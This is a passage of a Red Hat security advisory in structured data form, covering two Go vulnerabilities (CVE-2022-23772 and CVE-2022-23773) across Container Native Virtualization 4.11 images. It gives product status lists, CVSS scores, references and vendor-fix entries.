"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23772", }, { category: "external", summary: "RHBZ#2053532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053532", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23772", url: "https://www.cve.org/CVERecord?id=CVE-2022-23772", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-01-19T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", }, { cve: "CVE-2022-23773", cwe: { id: "CWE-1220", name: "Insufficient Granularity of Access Control", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053541", }, ], notes: [ { category: "description", text: "A flaw was found in the go package of the cmd library in golang. The go command could be tricked into accepting a branch, which resembles a version tag. This issue could allow a remote unauthenticated attacker to bypass security restrictions and introduce invalid or incorrect tags, reducing the integrity of the environment.", title: "Vulnerability description", }, { category: "summary", text: "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23773", }, { category: "external", summary: "RHBZ#2053541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053541", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23773", url: "https://www.cve.org/CVERecord?id=CVE-2022-23773", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-02-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", 